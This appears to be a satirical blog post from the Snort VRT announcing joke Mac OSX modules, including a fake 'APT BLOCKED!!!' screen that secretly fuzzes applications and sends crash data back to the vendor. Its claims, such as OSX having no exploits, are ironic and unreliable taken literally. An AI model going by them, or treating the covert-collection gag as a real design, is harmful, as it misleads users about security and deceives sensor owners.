So, what is this new module?  Well first, let me set the scene.  For those businesses that have OSX as their primary systems, they live in a security Nirvana.  Without exploits, viruses or rootkits to worry about, their security guys are much like the Maytag repairman.  Lots of time with their feet up, checking their brackets, developing the ultimate waste-paper basketball techniques and generally living life as only they can.  But we know and you know that they have to have systems going to make it look like they are working. So, in addition to the empty boxes that just have blinking LEDs on them, they also have firewalls, AV, IDS and other systems that they can look at intently when their bosses come over.

Now those of you with Windows systems are probably jealous that the Mac guys are getting yet another shiny toy.  But don't worry, since Snort is Open Source, you can always just stand up a box and call that network your "Mac" network.  You're golden.

Now, there are three variants of the new Mac OSX module.  The first is the Snort SETI plugin.  This will allow you to take all of those CPU cycles that you're spending not detecting attacks on Mac OSX systems and put it to use finding aliens.  We can't be wasting cycles in this day and age.  Also that we don't let these CPUs contribute to global warming, not cool (get it?).  Finally, the faster we find these aliens, the sooner we'll have our Elvis back.

The second module is a Systems Simulation and Exploitation Center.  This module will allow any of the systems running Snort to act as one of several pre-configured operating systems and applications.  Then, using a special client, you can execute a variety of "attacks" on the system.  The intended use of this is not to attract a mate, although I think we can all agree that there is nothing sexier than popping a shell.  But instead is to be used on patch days.

Invariably the following conversation occurs:

"Hey, um, systems guy, there is a huge patch out.  We have to stay late tonight, incur some downtime and patch the servers."

Systems guy stares at security guy.  Both of them are bathed in the noon-day flourescent light of the server room.  A single bead of sweat travels down the face of security guy.  Systems guy hasn't moved  His eyebrow twitches, and the corner of his mouth pulls up in what he thinks is a smile.

"Prove it".

Security guy fakes being concerned briefly, argues with the systems guy and finally storms out.  He spends the next hour in the office watching Glee re-runs and then storms out.  He drags the systems guy into the "lab" and then fires up the his special, VRT supplied client app.  He types furiously while ancient arcane symbols float around the screen.  Briefly the systems guy thinks he sees a picture of his mother, but it happens too fast for him to be sure.

Finally, triumphantly, security guy points to the screen.  A beautiful, fully interactive shell sits ready.  With a little extra configuration, you can make it look just like his desktop.  This is the beauty of the SSEC system.  When patch day comes, no one will stand in your way, because you are the supreme blackhat.

The final module is a favorite of the VRT and we'll be honest, it has little value for you, but it will make us super-duper happy.  The terminal will display a happy series of events, every now and then flashing "APT BLOCKED!!!!" in big red letters.  Your boss will nod his head sagely, after all, he did sign the PO, and then tell you to take the rest of the day off.

Meanwhile, that sensor, along with every other sensor running our special "APT BLOCKED!!!" module would constantly be fuzzing an application of our choice.  Indeed, each time you saw "APT BLOCKED!!!" it is actually an indication that we had successfully crashed the application and had sent the information on the crash back to the VRT lair.  How could your soul NOT be warmed by the knowledge that we reside, happy in our den, because you have given over your sensor to the fuzzing gods.

Well there you have it folks.  We know you Mac folks don't need security systems, so let's not waste those CPU cycles!  Feel free to download the beta here